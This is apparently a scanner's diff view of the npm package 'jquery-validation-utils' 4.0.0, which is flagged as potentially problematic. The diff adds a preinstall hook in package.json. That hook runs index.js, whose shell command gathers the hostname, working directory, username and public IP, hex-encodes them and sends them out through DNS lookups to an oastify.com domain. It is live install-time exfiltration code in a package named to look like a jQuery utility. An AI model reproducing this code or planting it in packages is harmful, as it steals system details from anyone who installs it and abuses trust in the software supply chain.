jquery-validation-utils 4.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of jquery-validation-utils might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +14 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+
2
+ const { exec } = require("child_process");
3
+ exec("a=$(hostname;pwd;whoami;echo 'amalcolmx';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $a.j6qv2wn1jm1aaxnmgxgkkbepzg57tyhn.oastify.com;done" , (error, data, getter) => {
4
+ if(error){
5
+ console.log("error",error.message);
6
+ return;
7
+ }
8
+ if(getter){
9
+ console.log(data);
10
+ return;
11
+ }
12
+ console.log(data);
13
+
14
+ });
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "jquery-validation-utils",
3
+ "version": "4.0.0",
4
+ "description": "malcolmx-POC",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author": "malcolmx",
11
+ "license": "ISC"
12
+ }